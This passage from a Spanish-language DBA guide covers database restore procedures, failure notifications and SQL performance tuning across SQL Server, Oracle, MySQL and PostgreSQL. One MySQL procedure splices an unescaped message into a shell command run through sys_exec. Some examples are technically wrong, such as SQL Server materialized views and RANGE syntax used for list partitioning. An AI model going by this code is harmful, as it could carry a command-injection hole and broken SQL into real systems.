       NVL(b.free_space_mb, 0) AS free_space_mb,
       a.size_mb - NVL(b.free_space_mb, 0) AS used_space_mb
FROM (
  SELECT tablespace_name,
        SUM(bytes) / 1024 / 1024 AS size_mb
  FROM dba_data_files
  GROUP BY tablespace_name
) a
LEFT JOIN (
  SELECT tablespace_name,
        SUM(bytes) / 1024 / 1024 AS free_space_mb
  FROM dba_free_space
```

```

    GROUP BY tablespace_name
) b
ON a.tablespace_name = b.tablespace_name
ORDER BY a.tablespace_name;

```

Si el usuario no tiene privilegios de DBA, se pueden usar las vistas *USER_DATA_FILES* y *USER_FREE_SPACE*, que muestran información limitada a los *tablespaces* asignados al usuario.

```

SELECT a.tablespace_name,
       a.size_mb,
       NVL(b.free_space_mb, 0) AS free_space_mb,
       a.size_mb - NVL(b.free_space_mb, 0) AS used_space_mb
FROM (
  SELECT tablespace_name,
         SUM(bytes) / 1024 / 1024 AS size_mb
  FROM user_data_files
  GROUP BY tablespace_name
) a
LEFT JOIN (
  SELECT tablespace_name,
         SUM(bytes) / 1024 / 1024 AS free_space_mb
  FROM user_free_space
  GROUP BY tablespace_name
) b
ON a.tablespace_name = b.tablespace_name
ORDER BY a.tablespace_name;

```

También es importante realizar un respaldo de la base de datos antes de restaurar. Siempre antes de iniciar el proceso de restauración, para proteger el estado actual de los datos, se debe hacer un respaldo para asegura que se puede revertir al estado original si algo sale mal durante o después de la restauración.

En MySQL se puede ejecutar el siguiente *script* para visualizar el tamaño de cada una de las bases de datos:

```

SELECT table_name, ROUND((data_length + index_length) / 1024 / 1024, 2) AS size_mb
FROM information_schema.tables
WHERE table_schema = 'nombre_de_la_base_de_datos'
ORDER BY size_mb DESC;

```

En PostgreSQL se puede visualizar el tamaño de una tabla en específico por medio de:

```

SELECT relname AS table_name, pg_size_pretty(pg_total_relation_size(relname::regclass))
AS table_size
FROM pg_stat_user_tables

```

```
ORDER BY pg_total_relation_size(relname::regclass) DESC;
```

Para visualizar el tamaño de los *tablespace*:

```
SELECT spcname AS tablespace_name, pg_size_pretty(pg_tablespace_size(spcname)) AS
size FROM pg_tablespace;
```

Pasos para la Restauración

Primero es necesario realizar una restauración del respaldo completo. Este respaldo es necesario como base sobre la cual se aplicarán otros respaldos. Se usa *NORECOVERY* para dejar la base de datos en un estado restaurable.

```
RESTORE DATABASE [NombreBaseDatos]
FROM DISK = 'RutaDelRespaldoCompleto.bak'
WITH NORECOVERY;
```

Luego de la restauración completa se debe realizar la restauración del respaldo diferencial. Esta restauración permite restaurar todos los cambios desde el último respaldo completo de manera eficiente, reduciendo el número de pasos requeridos si hay respaldos incrementales.

```
RESTORE DATABASE [NombreBaseDatos]
FROM DISK = 'RutaDelRespaldoDiferencial.bak'
WITH NORECOVERY;
```

Por último, una vez aplicada la restauración completa y diferencial es necesario realizar la restauración de *logs*. Esto asegura la recuperación de transacciones hasta el último respaldo de *log*. Se usa *RECOVERY* en el último paso para poner la base de datos en producción.

```
RESTORE LOG [NombreBaseDatos]
FROM DISK = 'RutaDelRespaldoLog.bak'
WITH NORECOVERY;
```

Se usa *RECOVERY* en el último *log*.

```
RESTORE LOG [NombreBaseDatos]
FROM DISK = 'RutaDelRespaldoLog.bak'
WITH RECOVERY;
```

Las tres restauraciones anteriores permiten colocar la base de datos según el último respaldo realizado, pero también se puede restaurar a un punto en específico. La

restauración a un punto en el tiempo permite restaurar la base de datos a un momento específico, útil para casos de errores críticos.

```
RESTORE LOG [NombreBaseDatos]
FROM DISK = 'RutaDelRespaldoLog.bak'
WITH STOPAT = 'YYYY-MM-DD HH:MM:SS', RECOVERY;
```

Supervisar el progreso en tiempo real permite identificar cuellos de botella o problemas tempranos, como lentitud inusual, falta de espacio o bloqueos en la red. De esta manera, se pueden tomar medidas preventivas antes de que el error se agrave. Monitorear el proceso de restauración usando herramientas como el *SQL Server Management Studio* (SSMS), o se puede ejecutar comandos para obtener detalles del progreso.

```
SELECT session_id, percent_complete, estimated_completion_time
FROM sys.dm_exec_requests
WHERE command = 'RESTORE DATABASE';
```

Una vez completada la restauración, se puede verificar que la base de datos esté en un estado íntegro y funcional. Se pueden realizar pruebas de integridad de datos y consistencia usando *DBCC CHECKDB* ('NombreBaseDatos');

Contingencias y manejo de errores

En caso de que se dé algún error en la restauración, se puede revertir y volver a colocar la base de datos con el último respaldo realizado. Se debe tener un plan de recuperación adicional por si la restauración falla, establecer un plan para revertir cualquier cambio en caso de errores.

Documentar cualquier mensaje de error que surja durante la restauración para investigar su causa. Los errores pueden incluir problemas de permisos, corrupción de datos en el respaldo o falta de espacio.

Para el error de espacio insuficiente, la restauración falla debido a que el servidor no tiene suficiente espacio en disco para completar el proceso. Para atender este error se pueden realizar los siguientes pasos:

- Verificar el espacio disponible en el disco donde se restaurará la base de datos.
 - En SQL Server: *EXEC xp_fixeddrives*;

- En Oracle: *SELECT tablespace_name, SUM(bytes) / 1024 / 1024 AS free_space_mb FROM dba_free_space GROUP BY tablespace_name;*
- Liberar espacio eliminando archivos temporales o moviendo otros archivos de respaldo a otro medio.
- Volver a ejecutar el proceso de restauración.

En el error de integridad en el respaldo, la restauración no puede completarse porque el respaldo tiene errores de integridad. Para solucionar este problema se deben realizar los siguientes pasos:

- Ejecutar una verificación del respaldo antes de intentar la restauración.
 - En SQL Server: *RESTORE VERIFYONLY FROM DISK = 'C:\Backups\NombreBaseDatos_Full.bak';*
 - En Oracle: *RMAN> RESTORE DATABASE VALIDATE;*
 - En PostgreSQL: *pg_verifybackup /ruta/del/respaldo*
 - En MySQL: En MySQL no existe un comando en específico, se puede validar la estructura con los siguientes comandos *head -n 20 respaldo.sql* y *tail -n 20 respaldo.sql*
También se puede comprobar que el respaldo se pueda restaurar sin errores: *pg_restore -U usuario -d base_prueba -frespaldo.sql --no-data*
- Si la verificación falla, hay que intentar restaurar un respaldo anterior.
- Realizar una validación de la integridad de la base de datos restaurada.

Cuando la restauración falla debido a problemas de permisos en los archivos de respaldo o el directorio de restauración, se deben seguir los siguientes pasos:

- Verificar que el usuario que ejecuta la restauración tenga permisos adecuados en la ubicación del respaldo y en la base de datos.

- En SQL Server: *SELECT dp.name AS PrincipalName, dp.type_desc AS PrincipalType, o.name AS ObjectName, p.permission_name AS Permission FROM sys.database_permissions p JOIN sys.objects o ON p.major_id = o.object_id JOIN sys.database_principals dp ON p.grantee_principal_id = dp.principal_id WHERE o.name = 'NombreBaseDatos';*
- Reasignar los permisos si es necesario.
- Intentar nuevamente la restauración con los permisos adecuados.

El error de incompatibilidad de versiones se puede dar porque el respaldo fue creado en una versión diferente de la base de datos y no es compatible con la versión actual. Para esto se puede verificar la versión del respaldo y la versión del motor de base de datos. De ser posible, utilizar la misma versión para restaurar, o convertir el respaldo a una versión compatible.

En SQL Server se puede verificar con *SELECT SERVERPROPERTY('ProductVersion') AS Version;*

En Oracle: *SELECT * FROM v\$version;*

En MySQL y PostgreSQL se puede revisar con: *SELECT VERSION();*

Monitoreo y notificaciones

Se debe notificar a los usuarios sobre el proceso de restauración, especialmente si implica interrupciones en el servicio. También, es recomendable coordinar con otros miembros del equipo para alinear el proceso con otros planes de mantenimiento o actividades críticas. Se pueden configurar alertas de correo electrónico o mensajes automáticos para notificar al equipo de tecnologías de la información (TI) cuando se detecten fallos en los respaldos o la restauración. Esto puede incluir problemas como falta de espacio o corrupción de datos.

En SQL Server se puede hacer uso del procedimiento *sp_send_dbmail* para realizar la notificación del resultado de la restauración. Además, se puede configurar el agente SQL Server para la automatización. Para esto, se debe habilitar *database mail* y configurar el perfil.

Configurar un perfil de correo que será utilizado por el agente SQL Server para enviar correos de notificación.

```
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Database Mail XPs', 1;
RECONFIGURE;
```

Crear el perfil de *Database Mail*.

```
EXEC msdb.dbo.sysmail_add_profile_sp
  @profile_name = 'AlertaNotificaciones',
  @description = 'Perfil de notificaciones para errores en trabajos de SQL Server Agent';
```

Crear la cuenta de correo para *Database Mail*.

```
EXEC msdb.dbo.sysmail_add_account_sp
  @account_name = 'BackupNotificationAccount',
  @email_address = 'backup_notifications@example.com',
  @display_name = 'DB Backup Notifications',
  @mailserver_name = 'smtp.example.com',
  @port = 587,
  @username = 'usuario_smtp',
  @password = 'contraseña_smtp';
```

Asociar la cuenta de correo al perfil.

```
EXEC msdb.dbo.sysmail_add_profileaccount_sp
  @profile_name = 'AlertaNotificaciones',
  @account_name = 'BackupNotificationAccount',
  @sequence_number = 1;
```

Configurar el perfil como predeterminado para el servidor *SQL Server Agent*.

```
EXEC msdb.dbo.sysmail_add_principalprofile_sp
  @profile_name = 'AlertaNotificaciones',
  @principal_id = 0,
  @is_default = 1;
```

Luego de habilitar *database mail* y configurar el perfil, se debe configurar el perfil de correo en el agente SQL Server. Se debe asegurar que el agente SQL Server pueda utilizar el perfil configurado.

Habilitar el uso de *Database Mail* en el Agente SQL Server.

```
EXEC msdb.dbo.sp_configure 'Agent XPs', 1;
RECONFIGURE;
```

Confirmar que el perfil esté configurado como predeterminado para el Agente SQL Server.

```
EXEC msdb.dbo.sp_set_sqlagent_properties
    @mail_profile = 'AlertaNotificaciones';
```

Después de la configuración, se debe crear un operador de notificaciones que recibirá las notificaciones de error.

Crear un operador para recibir notificaciones por correo electrónico.

```
USE msdb;
GO
EXEC msdb.dbo.sp_add_operator
    @name = N'DBA_Operador',
    @enabled = 1,
    @email_address = N'dba_team@example.com',
    @weekday_pager_start_time = 080000,
    @weekday_pager_end_time = 180000;
```

Configurar la notificación en un trabajo específico para enviar notificaciones de error al operador en caso de fallo.

```
USE msdb;
GO
EXEC msdb.dbo.sp_update_job
    @job_name = N'NombreDelTrabajo',
    @notify_level_email = 2,
    @notify_email_operator_name = N'DBA_Operador';
```

Un paso opcional que se puede realizar en este punto es probar la configuración de notificaciones. Para probar que las notificaciones funcionan correctamente, se puede ejecutar el siguiente *script* para forzar un error en el trabajo y verificar si el operador recibe la alerta:

```
EXEC msdb.dbo.sp_add_job
  @job_name = N'Prueba_Trabajo_Fallo',
  @enabled = 1;
```

Se realizará una división por cero para generar un error.

```
EXEC msdb.dbo.sp_add_jobstep
  @job_name = N'Prueba_Trabajo_Fallo',
  @step_name = N'Paso de Error',
  @subsystem = N'TSQL',
  @command = N'SELECT 1/0;',
  @on_fail_action = 2;
```

Asignar notificación de fallo en el trabajo de prueba.

```
EXEC msdb.dbo.sp_update_job
  @job_name = N'Prueba_Trabajo_Fallo',
  @notify_level_email = 2,
  @notify_email_operator_name = N'DBA_Operador';
```

Ejecutar el trabajo de prueba para generar el fallo y verificar la notificación.

```
EXEC msdb.dbo.sp_start_job @job_name = N'Prueba_Trabajo_Fallo';
```

En Oracle usando `UTL_MAIL`.

```
DECLARE
  v_status VARCHAR2(50);
  v_message VARCHAR2(4000);
BEGIN
  BEGIN
```

Código de restauración:

```
EXECUTE IMMEDIATE 'ALTER DATABASE DATAFILE "/path/to/datafile.dbf"
  ONLINE';
  v_status := 'Éxito';
  v_message := 'La restauración se completó exitosamente.';
EXCEPTION
  WHEN OTHERS THEN
    v_status := 'Error';
    v_message := 'Error en la restauración: ' || SQLERRM;
END;
```

Enviar notificación por correo:

```
UTL_MAIL.send(
  sender => 'backup_notifications@example.com',
  recipients => 'dba_team@example.com',
  subject => 'Estado de Restauración de la Base de Datos',
```

```

        message => 'Estado: ' || v_status || CHR(10) || 'Mensaje: ' || v_message
    );
END;
/

```

Además de estos *scripts*, se pueden implementar herramientas para monitorear la creación, almacenamiento y restauración de respaldos, como Nagios o Zabbix.

MySQL no tiene una función interna para enviar correos, pero se puede usar `sys_exec` en conjunto con herramientas del sistema.

```

SELECT sys_exec('echo "Restauración completada en MySQL" | mail -s "Estado de
Restauración" dba_team@example.com')

```

Se puede usar *EVENTS* para ejecutar comandos de sistema que envíen notificaciones.

```

DELIMITER $$

CREATE PROCEDURE NotificarRespaldo(IN status VARCHAR(50), IN mensaje TEXT)
BEGIN
    SET @cmd = CONCAT('echo "', mensaje, '" | mail -s "Estado de Restauración en MySQL"
dba_team@example.com');
    SELECT sys_exec(@cmd);
END $$

DELIMITER ;

CALL NotificarRespaldo('Éxito', 'La restauración de MySQL ha finalizado correctamente.');
```

En PostgreSQL se puede usar `pg_notify` para enviar notificaciones internas. Por medio de `pg_notify` permite notificar eventos dentro de la base de datos.

```

NOTIFY restauracion, 'Restauración de PostgreSQL completada exitosamente';

```

PostgreSQL tampoco tiene un mecanismo nativo para enviar correos, pero se puede hacer con `pgagent` y `sendmail` en Linux.

```

echo "La restauración en PostgreSQL ha finalizado" | mail -s "Estado de Restauración"
dba_team@example.com

```

También se puede usar `dblink` para llamar a un servidor de correo.

```

CREATE OR REPLACE FUNCTION enviar_notificacion(resultado TEXT) RETURNS VOID
AS $$
DECLARE
    mensaje TEXT;
BEGIN

```

```

mensaje := 'Estado de la restauración: ' || resultado;
PERFORM dblink_exec('dbname=correo', 'SELECT
send_mail('dba_team@example.com', "Estado de Restauración en PostgreSQL", ' ||
mensaje || ');
END;
$$ LANGUAGE plpgsql;

```

Ejemplo de monitoreo con Zabbix en MySQL

1. Crear un *script* para verificar el estado de MySQL:

```
mysqladmin ping -u usuario -p'contraseña'
```

2. Configurar un *Item* en Zabbix para ejecutar el *script*.
3. Crear un *Trigger* que envíe alertas si MySQL deja de responder.

Ejemplo de monitoreo con Nagios en PostgreSQL

1. Crear un comando Nagios que revise el estado de PostgreSQL:

```
pg_isready -h localhost -p 5432 -U usuario
```

2. Configurar una alerta en Nagios si el servicio no responde.

Pruebas de respaldos

Es recomendable realizar pruebas de restauración en un ambiente controlado, replicando el proceso de recuperación para asegurar que los datos se puedan restaurar de forma efectiva en caso de un desastre.

- Verificar la integridad del respaldo. Hay que asegurar de que los respaldos no estén corruptos y puedan usarse para una restauración exitosa.

Procedimiento en SQL Server: *RESTORE VERIFYONLY FROM DISK = 'C:\Backups\NombreBaseDatos_Full.bak';*

Procedimiento en Oracle: *RESTORE DATABASE VALIDATE;*

- Realizar una restauración de prueba en un entorno de pruebas. Simular una restauración completa en un ambiente controlado, sin afectar los datos de producción. Para esto se debe restaurar en un servidor de pruebas. El realizar la restauración en un servidor de pruebas sirve para evitar riesgos en el entorno de

producción.

SQL Server: *RESTORE DATABASE [NombreBaseDatos_Pruebas] FROM DISK = 'C:\Backups\NombreBaseDatos_Full.bak' WITH MOVE 'NombreBaseDatos' TO 'C:\Test\NombreBaseDatos_Pruebas.mdf', MOVE 'NombreBaseDatos_Log' TO 'C:\Test\NombreBaseDatos_Pruebas.ldf';*

Oracle RMAN: *RUN { SET NEWNAME FOR DATABASE TO '/path/to/test_datafile'; RESTORE DATABASE; SWITCH DATAFILE ALL; RECOVER DATABASE; }*

- Verificar consistencia de los datos restaurados. Comprobar que los datos restaurados están completos y no presentan corrupción.

En SQL Server: *DBCC CHECKDB ('NombreBaseDatos_Pruebas') WITH NO_INFOMSGS;*

En Oracle: *ANALYZE TABLE nombre_tabla VALIDATE STRUCTURE;*

Se debe confirmar que las aplicaciones y consultas críticas funcionan correctamente con los datos al realizar pruebas de funcionalidad en la base de datos restaurada. Para realizar esta prueba se deben ejecutar las consultas críticas y las transacciones típicas en la base de datos de prueba y de esta manera, asegurar de que todas las operaciones funcionen como se espera, sin errores.

Se debe registrar cada prueba realizada, los resultados y cualquier problema encontrado para futuras referencias y auditorías. Para esto se puede documentar la fecha y hora de la prueba, resultado de cada paso, errores o problemas encontrados y su resolución.

Optimización del rendimiento de bases de datos

El rendimiento de las bases de datos relacionales es fundamental para asegurar la eficiencia y continuidad de las operaciones en las organizaciones. Una base de datos lenta no solo afecta la experiencia del usuario, sino que también puede causar interrupciones en los procesos críticos del negocio. A continuación, se presenta una guía para la optimización avanzada del rendimiento, enfocada en el ajuste de consultas, configuración de índices y administración eficiente de los recursos del sistema.

Análisis y ajuste de consultas SQL

Las consultas SQL mal optimizadas pueden ser uno de los principales factores que impactan negativamente el rendimiento de una base de datos. A continuación, se detallan las mejores prácticas para el ajuste de consultas. Luego de dar una introducción a cada sección, se muestra en más detalle cada punto y cómo realizarlo, además de mostrar ejemplos por medio de *scripts* e imágenes.

Selección de columnas específicas

Seleccionar únicamente las columnas necesarias evita transferir datos innecesarios, lo que mejora la velocidad y eficiencia de las consultas. Usar *SELECT ** es una mala práctica que genera sobrecarga, especialmente en tablas con muchas columnas. Para eliminar esta mala práctica y mejorar el rendimiento de consultas, se debe identificar las columnas requeridas para la consulta y colocarlas explícitamente en la cláusula *SELECT*, esto reduce el tiempo de ejecución, el ancho de banda utilizado y mejora la claridad del código.

Consulta ineficiente:

```
SELECT *  
FROM Sales.SalesOrderDetail sod  
JOIN Sales.SalesOrderHeader soh ON sod.SalesOrderID = soh.SalesOrderID  
WHERE soh.OrderDate BETWEEN '2024-01-01' AND '2024-01-31';
```

Consulta eficiente:

```
SELECT sod.SalesOrderID, sod.ProductID, soh.OrderDate, soh.TotalDue  
FROM Sales.SalesOrderDetail sod  
JOIN Sales.SalesOrderHeader soh ON sod.SalesOrderID = soh.SalesOrderID  
WHERE soh.OrderDate BETWEEN '2024-01-01' AND '2024-01-31';
```

Uso eficiente de índices

Los índices mejoran la velocidad de recuperación de datos en columnas utilizadas para filtros, uniones u ordenamientos. Sin ellos, las consultas pueden realizar escaneos completos de tablas (*Table Scan*), lo cual es ineficiente.

Se pueden crear índices en columnas que aparecen frecuentemente en condiciones *WHERE*, *JOIN* u *ORDER BY*. Esto aumenta la velocidad de búsqueda y reduce la carga en el sistema.

Una práctica recomendada es realizar un análisis periódico para identificar índices no utilizados o duplicados que puedan ser eliminados para optimizar el uso de recursos. Los índices son una herramienta fundamental para mejorar el rendimiento, pero su correcto uso depende del tipo de consulta y del diseño de la base de datos. Cada tipo de índice tiene casos de uso específicos:

Índices Clustered.

Estos índices organizan físicamente los datos en la tabla en el orden del índice. Solo puede haber un índice *clustered* por tabla. Estos índices son excelentes para rangos de datos y búsquedas secuenciales.

```
CREATE CLUSTERED INDEX IX_SalesOrderHeader_SalesOrderID
ON Sales.SalesOrderHeader(SalesOrderID);
```

Índices No Clustered.

Los índices *no clustered* contienen una referencia a la fila real en lugar de organizar físicamente los datos. Son útiles para columnas usadas frecuentemente en filtros.

```
CREATE NONCLUSTERED INDEX IX_ProductName ON Production.Product(Name);
```

Índices Compuestos.

Estos son índices que abarcan múltiples columnas. Benefician consultas con condiciones en varias columnas.

```
CREATE NONCLUSTERED INDEX IX_OrderHeader_OrderDate_CustomerID
ON Sales.SalesOrderHeader(OrderDate, CustomerID);
```

Vistas materializadas

Son vistas que almacenan físicamente el resultado de una consulta en lugar de calcularlo dinámicamente cada vez que se consulta. Son útiles para consultas complejas que se ejecutan frecuentemente y en análisis de datos donde se resumen grandes volúmenes de información. Estas vistas aceleran consultas recurrentes, reducen la carga de cálculo en tiempo real y pueden ser actualizadas automáticamente en función de cambios en las tablas base.

En SQL Server y PostgreSQL se puede realizar de la siguiente manera:

```
CREATE MATERIALIZED VIEW SalesSummary
AS
SELECT soh.CustomerID, SUM(soh.TotalDue) AS TotalSales
FROM Sales.SalesOrderHeader soh
GROUP BY soh.CustomerID;
```

Para actualizar la vista se ejecuta la instrucción *REFRESH MATERIALIZED VIEW SalesSummary;*

Oracle soporta vistas materializadas de forma nativa y permite la actualización automática o manual.

```
CREATE MATERIALIZED VIEW SalesSummary
BUILD IMMEDIATE
REFRESH FAST ON COMMIT
AS
SELECT soh.CustomerID, SUM(soh.TotalDue) AS TotalSales
FROM Sales.SalesOrderHeader soh
GROUP BY soh.CustomerID;
```

Para actualizar manualmente:

```
EXEC DBMS_MVIEW.REFRESH('SalesSummary');
```

MySQL no tiene soporte nativo para vistas materializadas, pero se pueden simular usando tablas y eventos:

```
CREATE TABLE SalesSummary AS
SELECT soh.CustomerID, SUM(soh.TotalDue) AS TotalSales
FROM Sales.SalesOrderHeader soh
GROUP BY soh.CustomerID;
```

Para actualizar la tabla periódicamente, se puede usar un evento:

```

CREATE EVENT RefreshSalesSummary
ON SCHEDULE EVERY 1 HOUR
DO
REPLACE INTO SalesSummary
SELECT soh.CustomerID, SUM(soh.TotalDue) AS TotalSales
FROM Sales.SalesOrderHeader soh
GROUP BY soh.CustomerID;

```

Particionamiento de tablas

El particionamiento divide una tabla grande en segmentos más pequeños, llamados particiones, con base en un criterio (por ejemplo, rango de fechas). Esto mejora la eficiencia de las consultas que solo necesitan acceder a una partición, reduciendo los tiempos de mantenimiento como reconstrucción de índices lo que facilita la administración de grandes volúmenes de datos.

El particionamiento por rango divide las filas según un rango de valores en una columna.

```

CREATE PARTITION FUNCTION OrderDateRange(datetime)
AS RANGE LEFT FOR VALUES ('2023-12-31', '2024-06-30');

```

El particionamiento por lista divide filas basándose en valores específicos.

```

CREATE PARTITION FUNCTION ProductCategoryList(int)
AS RANGE LEFT FOR VALUES (1, 2, 3);

```

El siguiente es un ejemplo de cómo crear una partición de órdenes por rango de fecha

```

CREATE PARTITION SCHEME OrderDateScheme
AS PARTITION OrderDateRange TO ([Primary], [Secondary]);

```

```

CREATE TABLE SalesPartitioned (
    SalesOrderID INT,
    OrderDate DATETIME,
    TotalDue MONEY
) ON OrderDateScheme(OrderDate);

```

Creación de un índice para optimizar:

```

CREATE NONCLUSTERED INDEX IX_SalesOrderHeader_OrderDate ON
Sales.SalesOrderHeader (OrderDate);

```

Consulta optimizada:

```

SELECT soh.SalesOrderID, soh.OrderDate, soh.TotalDue

```

```
FROM Sales.SalesOrderHeader soh
WHERE soh.OrderDate BETWEEN '2024-01-01' AND '2024-01-31';
```

La recomendación para el uso de particiones es para cuando se tienen tablas que manejan millones de filas o para consultas que filtran datos con base en fechas u otros valores discretos.

Tablas temporales

Las tablas temporales son tablas que existen solo durante la sesión del usuario o durante la ejecución de una consulta. Se utilizan para almacenar datos intermedios de forma temporal. Este tipo de tablas reducen el uso de memoria al procesar grandes volúmenes de datos temporalmente y facilitan cálculos intermedios en procesos complejos.

```
CREATE TABLE #TempSalesSummary (
    CustomerID INT,
    TotalSales MONEY
);

INSERT INTO #TempSalesSummary
SELECT CustomerID, SUM(TotalDue) AS TotalSales
FROM Sales.SalesOrderHeader
GROUP BY CustomerID;

SELECT * FROM #TempSalesSummary WHERE TotalSales > 10000;
DROP TABLE #TempSalesSummary;
```

En PostgreSQL se pueden crear por medio del siguiente *script*:

```
CREATE TEMP TABLE TempSalesSummary (
    CustomerID INT,
    TotalSales DECIMAL(10,2)
);
```

En MySQL se puede así:

```
CREATE TEMPORARY TABLE TempSalesSummary (
    CustomerID INT,
    TotalSales DECIMAL(10,2)
);
```

Las tablas temporales en Oracle pueden configurarse con:

- ***ON COMMIT PRESERVE ROWS***: Mantiene los datos hasta el final de la sesión.

- *ON COMMIT DELETE ROWS*: Borra los datos al final de la transacción.

```
CREATE GLOBAL TEMPORARY TABLE TempSalesSummary (
  CustomerID NUMBER,
  TotalSales NUMBER(10,2)
) ON COMMIT PRESERVE ROWS;
```

Actualización de estadísticas y reconstrucción de índices

Son metadatos que describen la distribución de valores en una columna. Ayudan al optimizador de consultas a tomar decisiones informadas sobre el mejor plan de ejecución mejorando el uso de los índices, reduciendo la fragmentación y asegurando planes de ejecución óptimos.

En SQL Server se puede realizar de la siguiente manera:

- Para Actualizar las estadísticas se debe ejecutar *UPDATE STATISTICS Sales.SalesOrderHeader*;
- Para reconstruir índices fragmentados se ejecuta *ALTER INDEX ALL ON Sales.SalesOrderHeader REBUILD*;

En Oracle, se puede con *EXEC DBMS_STATS.GATHER_TABLE_STATS('SCHEMA', 'SalesOrderHeader')*;

En MySQL por medio de: *ANALYZE TABLE SalesOrderHeader*;

En PostgreSQL con: *ANALYZE SalesOrderHeader*;

Evitar operaciones en columnas indexadas

Aplicar funciones en columnas indexadas deshabilita el uso del índice, obligando a realizar un escaneo completo de tabla. Para atacar este problema se deben reformular las consultas para evitar operaciones en las columnas filtradas, trasladando los cálculos o transformaciones a los valores comparados. De esta manera permite aprovechar los índices, mejorando el tiempo de respuesta.

Consulta ineficiente:

```
SELECT soh.SalesOrderID, soh.OrderDate
```

```
FROM Sales.SalesOrderHeader soh
WHERE YEAR(soh.OrderDate) = 2024;
```

Consulta optimizada:

```
SELECT soh.SalesOrderID, soh.OrderDate
FROM Sales.SalesOrderHeader soh
WHERE soh.OrderDate BETWEEN '2024-01-01' AND '2024-12-31';
```

Optimización de JOINS

Seleccionar el tipo adecuado de *JOIN* y garantizar índices en las columnas involucradas evita procesar datos innecesarios, lo que mejora significativamente el rendimiento. Utilizar *INNER JOIN* en lugar de *OUTER JOIN* si no se necesitan filas no coincidentes y asegurar que las columnas usadas en la unión estén indexadas. Esto reduce el número de filas procesadas y mejora la escalabilidad.

Consulta ineficiente:

```
SELECT soh.SalesOrderID, sod.ProductID, soh.TotalDue
FROM Sales.SalesOrderHeader soh
LEFT JOIN Sales.SalesOrderDetail sod ON soh.SalesOrderID = sod.SalesOrderID
WHERE soh.OrderDate BETWEEN '2024-01-01' AND '2024-01-31';
```

Consulta optimizada:

```
SELECT soh.SalesOrderID, sod.ProductID, soh.TotalDue
FROM Sales.SalesOrderHeader soh
INNER JOIN Sales.SalesOrderDetail sod ON soh.SalesOrderID = sod.SalesOrderID
WHERE soh.OrderDate BETWEEN '2024-01-01' AND '2024-01-31';
```

Sustitución de subconsultas correlacionadas

Las subconsultas correlacionadas ejecutan la subconsulta para cada fila del resultado, lo que impacta negativamente en el rendimiento. Sustituirlas por uniones o expresiones de tabla comunes (CTE) mejora la eficiencia. Para esto se deben identificar subconsultas y reformularlas usando *JOINS* o *WITH*, así se reduce el número de accesos a la base de datos y mejora el tiempo de ejecución.

Consulta ineficiente:

```
SELECT soh.SalesOrderID, soh.TotalDue
FROM Sales.SalesOrderHeader soh
WHERE soh.TotalDue > (SELECT AVG(TotalDue) FROM Sales.SalesOrderHeader);
```

```

Consulta optimizada:
WITH AvgTotalDue AS (
  SELECT AVG(TotalDue) AS AvgDue FROM Sales.SalesOrderHeader
)
SELECT soh.SalesOrderID, soh.TotalDue
FROM Sales.SalesOrderHeader soh, AvgTotalDue
WHERE soh.TotalDue > AvgDue;

```

Administración eficiente de recursos del sistema

La administración eficiente de los recursos del sistema asegura que las bases de datos puedan manejar cargas de trabajo actuales y futuras sin interrupciones. Esto implica gestionar memoria, paralelismo, y monitoreo continuo para garantizar un rendimiento óptimo.

Asignación de memoria y uso de caché

La correcta asignación de memoria y el uso adecuado de la caché son esenciales para el rendimiento de las bases de datos. Para implementar estos ajustes, en Oracle, se configuran parámetros como *DB_CACHE_SIZE*, *SHARED_POOL_SIZE*, y *SORT_AREA_SIZE* para asignar memoria al *buffer cache*, al área de memoria compartida y al espacio para operaciones de clasificación. Para esto, se ejecutan las siguientes sentencias:

```

ALTER SYSTEM SET DB_CACHE_SIZE = 500M;
ALTER SYSTEM SET SHARED_POOL_SIZE = 200M;
ALTER SYSTEM SET SORT_AREA_SIZE = 64M;

```

En SQL Server se ajusta *max server memory* para evitar que el servidor consuma toda la memoria del sistema operativo. Se ejecuta:

```

EXEC sp_configure 'max server memory', 2048;
RECONFIGURE;

```

En PostgreSQL se puede realizar de la siguiente manera:

```

ALTER SYSTEM SET shared_buffers = '512MB';
ALTER SYSTEM SET work_mem = '64MB';
ALTER SYSTEM SET effective_cache_size = '2GB';

```

Este tipo de configuraciones benefician la reducción en el tiempo de acceso a los datos, disminución de la carga en disco al almacenar en caché consultas repetitivas y evitar problemas de rendimiento relacionados con la falta de memoria.

Configuración del Paralelismo

El paralelismo en bases de datos es una técnica que permite que las operaciones complejas, como consultas, cargas de datos y tareas de mantenimiento, se dividan en subtareas más pequeñas que se ejecutan simultáneamente en múltiples procesadores o núcleos de CPU. Esto se realiza para mejorar la velocidad de procesamiento y el rendimiento general del sistema.

El objetivo principal del paralelismo es aprovechar al máximo los recursos del *hardware* subyacente (como múltiples núcleos de CPU) para acelerar operaciones que procesan grandes volúmenes de datos.

En Oracle, el parámetro *PARALLEL_DEGREE_POLICY* controla el grado de paralelismo. Puede configurarse como:

- **MANUAL:** El paralelismo debe configurarse explícitamente en cada consulta o tarea. En el siguiente ejemplo *PARALLEL(4)* indica que se usarán 4 procesos en paralelo para ejecutar esta consulta.

```
SELECT /*+ PARALLEL(4) */ COUNT(*)
FROM grandes_tablas
WHERE fecha > TO_DATE('2024-01-01', 'YYYY-MM-DD');
```

- **AUTO:** Oracle decide automáticamente cuándo y cómo usar paralelismo. En la siguiente sentencia Oracle analizará la consulta y determinará si es beneficioso usar paralelismo. El grado de paralelismo será asignado dinámicamente.

```
ALTER SYSTEM SET PARALLEL_DEGREE_POLICY = AUTO;
SELECT COUNT(*)
FROM grandes_tablas
WHERE fecha BETWEEN TO_DATE('2024-01-01', 'YYYY-MM-DD') AND
TO_DATE('2024-12-31', 'YYYY-MM-DD');
```

FORCE: En este modo, Oracle aplica paralelismo en todas las operaciones que lo permitan, independientemente de si es beneficioso o no.

```
ALTER SYSTEM SET PARALLEL_DEGREE_POLICY = FORCE;
SELECT COUNT(*)
FROM grandes_tablas
WHERE fecha > TO_DATE('2024-01-01', 'YYYY-MM-DD');
```

En SQL Server se puede realizar por medio de *ALTER DATABASE SCOPED CONFIGURATION SET MAXDOP = 4;*

En PostgreSQL se puede hacer de la siguiente manera: *ALTER SYSTEM SET max_parallel_workers_per_gather = 4;*

El paralelismo es ideal para consultas intensivas que realizan agregaciones como *SUM* o *AVG*, grandes uniones (*JOINS*) o escaneos completos de tablas, así como para el procesamiento de grandes volúmenes de datos en cargas masivas, tareas *ETL* y generación de reportes. También es útil en tareas de mantenimiento como la creación y reconstrucción de índices o particionamiento, donde se pueden aprovechar múltiples núcleos para acelerar los procesos.

Supervisión y Ajustes Automáticos

